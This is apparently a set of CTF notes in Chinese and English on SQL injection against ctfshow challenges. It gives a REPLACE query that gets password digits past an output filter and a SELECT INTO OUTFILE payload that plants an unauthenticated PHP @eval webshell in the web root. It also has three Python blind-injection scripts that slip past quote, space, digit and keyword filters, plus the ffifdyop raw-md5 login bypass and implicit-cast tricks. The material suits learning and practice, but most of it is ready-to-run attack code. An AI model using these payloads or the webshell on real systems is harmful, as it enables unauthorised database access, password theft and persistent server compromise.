使用 REPLACE 进行替代：当返回结果中的数字被过滤（无法回显数字）时，可以在查询里用 REPLACE 把密码中的每个数字换成对应的符号，拿到结果后再按映射关系还原，例如：
-- Map every digit of `password` to a punctuation mark before it is returned,
-- for the case where the response cannot carry digits (they are filtered):
--   0 1 2 3 4 5 6 7 8 9   ->   ! @ # $ % ^ & * ( )
-- Each nested REPLACE rewrites one digit (innermost handles 0, outermost 9);
-- the integer literals are coerced to strings by MySQL. Decode the output by
-- reversing the mapping.
SELECT
    username,
    REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(
    REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(
        password,
        0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'),
        5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')')
FROM user;
-- Drop a PHP webshell into the web root with SELECT ... INTO OUTFILE.
-- Prerequisites a practitioner should check first: the DB account has the
-- FILE privilege, secure_file_priv is empty (NULL disables it; a directory
-- restricts it), the mysqld OS user can write to /var/www/html, and 1.php does
-- not already exist (OUTFILE never overwrites). The written file is an
-- unauthenticated `@eval` backdoor taking code from POST parameter x -- lab
-- use only; remove it when done.
SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'
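import requests
import time

# Boolean-based blind SQL injection through the `tableName` POST parameter of
# select-waf.php (ctfshow). The injected table expression is
#   `ctfshow_user`where`pass`regexp'^<prefix>'
# -- backtick-quoted identifiers let the whole expression be written without
# spaces (presumably because spaces are filtered). The oracle is the string
# "$user_count = 1;" in the response, presumably emitted when the injected
# query returns exactly one row, i.e. when the guessed prefix is correct.
URL = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php'
PAYLOAD = "`ctfshow_user`where`pass`regexp'^{}'"
# Candidate alphabet for the next character.
# NOTE(review): `{`, `}` and `-` are sent unescaped to the server-side regexp
# engine; the writeup relies on the target accepting them literally -- verify
# against the challenge before reusing this elsewhere.
DIC = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
ORACLE = '$user_count = 1;'
TIMEOUT = 10  # seconds; the original request had no timeout and could hang forever
DELAY = 0.25  # pause between requests so the instance is not hammered


def get_response(result):
    """Try to extend the recovered prefix `result` by one character.

    Sends one request per candidate in DIC and returns the extended prefix
    as soon as the oracle string is seen, or `result` unchanged when no
    candidate matched (end of the value, or a character outside DIC).
    Network errors propagate as requests exceptions.
    """
    for ch in DIC:
        data = {'tableName': PAYLOAD.format(result + ch)}
        response = requests.post(URL, data=data, timeout=TIMEOUT)
        time.sleep(DELAY)
        # `in` instead of find() > 0: the original missed a marker at index 0.
        if ORACLE in response.text:
            return result + ch
    return result


if __name__ == '__main__':
    result = ''
    # One character per call; stop at the closing brace, when nothing matches,
    # or after a sanity cap (flags here are well under 64 characters).
    for _ in range(64):
        extended = get_response(result)
        if extended == result:
            break
        result = extended
        print(result)
        if result.endswith('}'):
            break
    print(result)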
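import requests
import time

# Boolean-based blind SQL injection through the `tableName` POST parameter of
# select-waf.php (ctfshow). The guessed prefix is sent as a hex literal
# (0x...), so the payload contains no quote characters at all;
# `group by pass having` stands in for `where`, presumably because `where`
# is filtered. The oracle is the string "$user_count = 1;" in the response,
# presumably emitted when the injected query returns exactly one row.
URL = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php'
PAYLOAD = "ctfshow_user group by pass having pass regexp(0x{})"
DIC = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
ORACLE = '$user_count = 1;'
TIMEOUT = 10  # seconds; the original request had no timeout and could hang forever
DELAY = 0.25  # pause between requests so the instance is not hammered


def str2hex(string):
    """Hex-encode `string` (UTF-8) with no 0x prefix, e.g. 'ab' -> '6162'.

    bytes.hex() always emits two digits per byte; the original hex(ord(c))
    dropped the leading zero for code points below 0x10.
    """
    return string.encode('utf-8').hex()


def get_response(result):
    """Try to extend the recovered prefix `result` by one character.

    Sends one request per candidate in DIC and returns the extended prefix
    as soon as the oracle string is seen, or `result` unchanged when no
    candidate matched. Network errors propagate as requests exceptions.
    """
    for ch in DIC:
        # '^' anchors the regexp to the start of `pass`, as the other scripts
        # on this page do; the original omitted it, so a guess could match a
        # substring anywhere in the value.
        guess = '^' + result + ch
        data = {'tableName': PAYLOAD.format(str2hex(guess))}
        response = requests.post(URL, data=data, timeout=TIMEOUT)
        time.sleep(DELAY)
        # `in` instead of find() > 0: the original missed a marker at index 0.
        if ORACLE in response.text:
            return result + ch
    return result


if __name__ == '__main__':
    result = ''
    # One character per call; stop at the closing brace, when nothing matches,
    # or after a sanity cap (flags here are well under 64 characters).
    for _ in range(64):
        extended = get_response(result)
        if extended == result:
            break
        result = extended
        print(result)
        if result.endswith('}'):
            break
    print(result)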
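import requests
import time

# Boolean-based blind SQL injection through the `tableName` POST parameter of
# select-waf.php (ctfshow), for a filter that rejects digits (and quotes):
# every character of the guess is rebuilt server-side as
#   char(concat((d1),(d2),(d3)))
# where each decimal digit d of its code point is written as boolean
# arithmetic -- '0' -> false, '1' -> true, '2' -> true+true, ... so the
# payload contains no digit characters at all. The oracle is the string
# "$user_count = 1;" in the response, presumably emitted when the injected
# query returns exactly one row.
true_dict = {
    '0': 'false',
    '1': 'true',
}
for _i in range(2, 10):
    true_dict[str(_i)] = true_dict['1'] + '+true' * (_i - 1)

URL = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
# `group by pass having` stands in for `where`, presumably because it is filtered.
PAYLOAD = "ctfshow_user group by pass having pass regexp(concat({}))"
DIC = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
ORACLE = '$user_count = 1;'
TIMEOUT = 10  # seconds; the original request had no timeout and could hang forever
DELAY = 0.25  # pause between requests so the instance is not hammered


def word2char(word):
    """Encode one character as a digit-free MySQL char(concat(...)) expression.

    Example: 'c' (code point 99) -> 'char(concat((true+...9),(true+...9)))'.
    """
    digits = ('(' + true_dict[d] + ')' for d in str(ord(word)))
    return 'char(concat(' + ','.join(digits) + '))'


def sentence2true(string):
    """Encode `string` as a comma-separated list of word2char() expressions.

    Returns '' for an empty string, so it can be dropped straight into
    concat(...).
    """
    return ','.join(word2char(ch) for ch in string)


def get_response(result):
    """Try to extend the recovered prefix `result` by one character.

    Sends one request per candidate in DIC and returns the extended prefix
    as soon as the oracle string is seen, or `result` unchanged when no
    candidate matched. Network errors propagate as requests exceptions.
    """
    for ch in DIC:
        # The leading '^' (code point 94) anchors the regexp to the start of
        # `pass`; encoding it with word2char() yields exactly the hard-coded
        # char(concat((9 trues),(4 trues))) prefix of the original payload.
        data = {'tableName': PAYLOAD.format(sentence2true('^' + result + ch))}
        response = requests.post(URL, data=data, timeout=TIMEOUT)
        time.sleep(DELAY)
        # `in` instead of find() > 0: the original missed a marker at index 0.
        if ORACLE in response.text:
            return result + ch
    return result


if __name__ == '__main__':
    result = ''
    # One character per call; stop at the closing brace, when nothing matches,
    # or after a sanity cap (flags here are well under 64 characters).
    for _ in range(64):
        extended = get_response(result)
        if extended == result:
            break
        result = extended
        print(result)
        if result.endswith('}'):
            break
    print(result)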
字符串 ffifdyop 经过 md5 加密后（十六进制）为：276f722736c95d99e921722cf9ed621c
若以原始二进制形式输出（如 PHP 的 md5($str, true)），这 16 个字节对应的字符串以 'or'6 开头，其后是不可打印字节：'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
select * from admin where password=''or'6<乱码>'
在 MySQL 中，字符串 '6<乱码>' 作为布尔条件时会按前导数字转换为数值 6，非零即为真，因此相当于 select * from admin where password='' or 1，条件恒真。
从而绕过密码校验，实现 SQL 注入（前提是后端用 md5($pass, true) 得到原始字节并直接拼接进 SQL 语句，而不是参数化查询）。
# MySQL implicit cast: comparing a string column with an integer converts the
# string to a number from its leading digits (a non-numeric prefix casts to 0).
# Returns every row whose username does not start with a digit (all cast to 0).
select pass from ctfshow_user where username = 0;
# Returns only rows whose username's leading numeric prefix is 1 (e.g. '1', '1abc').
select pass from ctfshow_user where username = 1;